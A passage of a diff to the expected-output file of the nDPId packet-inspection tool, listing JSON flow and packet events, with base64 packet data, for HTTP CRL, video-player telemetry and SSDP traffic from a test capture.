=="} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} +01506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1467353172450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":839,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":839,"pkt_l4_len":805,"thread_ts_msec":1467353172450,"pkt":"ABxCjnAxTF4M6gNlCABFAAM59KBAADkGeaEXKYWjwKhzCABQxUTR80FiXp79f1AYA7JdXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZQ0KRVRhZzogIjM2ZGFiMGNkZDA1ODVlZmNmMjhlYjY3NzRhZWVlOTJhOjE0NjY3OTc4MTQiDQpMYXN0LU1vZGlmaWVkOiBGcmksIDI0IEp1biAyMDE2IDE5OjUwOjE0IEdNVA0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoxMSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA1MzMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vcGtpeC1jcmwNCg0KMIICETCB+jANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMTowOAYDVQQLEzEoYykgMjAwNiBWZXJpU2lnbiwgSW5jLiAtIEZvciBhdXRob3JpemVkIHVzZSBvbmx5MUUwQwYDVQQDEzxWZXJpU2lnbiBDbGFzcyAzIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzUXDTE2MDYyMzAwMDAwMFoXDTE2MDkzMDIzNTk1OVowDQYJKoZIhvcNAQEFBQADggEBAEI97eVcH1DiB1\/0Bno6J+K8HusVe3cUvr5+fyScH1zXRcf7c5djWYgN+SuML4v70NdV\/FuJwb2d1nTAPxF1qboQaHggi98zdzXj8RwrHgS5mm8yRgjh5Xn7nIaC171csZuQguJ7tmZuJ7r76UMkne0JyJ14wsSf90xX+g\/a\/dFyP90Y6ni5xSPgpc8d3Zgw\/EfU0UQm\/T+f09jhD1\/1X6BOBM7pQUZMpb0wu+RThkQxkoU7zdqSaSWoF1RKiDChBGCnoysqx+p1d9U16eVsZvZ0VQEVpSaXicfzrXu+tMxjeZnFuPSglD2NZ6ZxRQtvm2pR35dtCeWkmxI8I6zBG3M="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1467353172912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353172912,"pkt":"TF4M6gNlABxCjnAxCABFAAOkIBFAAIAGyjnAqHMIymwO7MVFAFDpA4X9\/kkVyVAYQTfM+gAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNzIwNTEmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1467353173018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353173018,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5BZNAADMGNKPKbA7swKhzCABQxUX+SRXJ6QOJeVAYACCXCgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEyIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1467353179045,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353179045,"pkt":"AQBef\/\/6cBiLE+IdCABFAAChI6EAAAER3+LAqAUm7\/\/\/+uYRB2wAjbWjTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353179045,"flow_last_seen":1467353179045,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353179045,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1467353180202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180202,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJdtAAIAGxG7AqHMIymwO7MVFAFDpA4l5\/kkWWlAYQRLiXwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180357,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJglAAIAGxEDAqHMIymwO7MVGAFChhpBHZLD+y1AYQTfUEAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} -01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7440000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1467353180443,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353180443,"pkt":"ABxCjnAxTF4M6gNlCABFAAC501VAADMGZuDKbA7swKhzCABQxUZksP7LoYaTxFAYACF90QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjE5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1467353180202,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180202,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJdtAAIAGxG7AqHMIymwO7MVFAFDpA4l5\/kkWWlAYQRLiXwAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7560000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1467353180357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":947,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":947,"pkt_l4_len":913,"thread_ts_msec":1467353180357,"pkt":"TF4M6gNlABxCjnAxCABFAAOlJglAAIAGxEDAqHMIymwO7MVGAFChhpBHZLD+y1AYQTfUEAAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODAwNTImc2g9JnNxPSZzdz0mdD1taWQmdT0wX2Fhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9NDc5NTMxMDAwJnZ2PTUuMi4xNS4yMjQwJng9Jnk9cWNfMTAwMDAxXzEwMDE0MCBIVFRQLzEuMQ0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTg0KUmVmZXJlcjogaHR0cDovL3d3dy5pcWl5aS5jb20vY29tbW9uL2ZsYXNocGxheWVyLzIwMTQwOTI0L01haW5QbGF5ZXJfNV8yXzNfYzNfMl8xXzYuc3dmDQpxeWlkOiBhYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6IF8yMDEyDQpxeXBsYXRmb3JtOiAwLTINCngtZmxhc2gtdmVyc2lvbjogMTIsMCwwLDcwDQpBY2NlcHQ6ICovKg0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjApL1FZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KDQo="} +01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1133,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353180357,"flow_last_seen":1467353180357,"flow_idle_time":7560000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353180357,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353180052&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1467353180443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353180443,"pkt":"ABxCjnAxTF4M6gNlCABFAAC501VAADMGZuDKbA7swKhzCABQxUZksP7LoYaTxFAYACF90QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjE5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 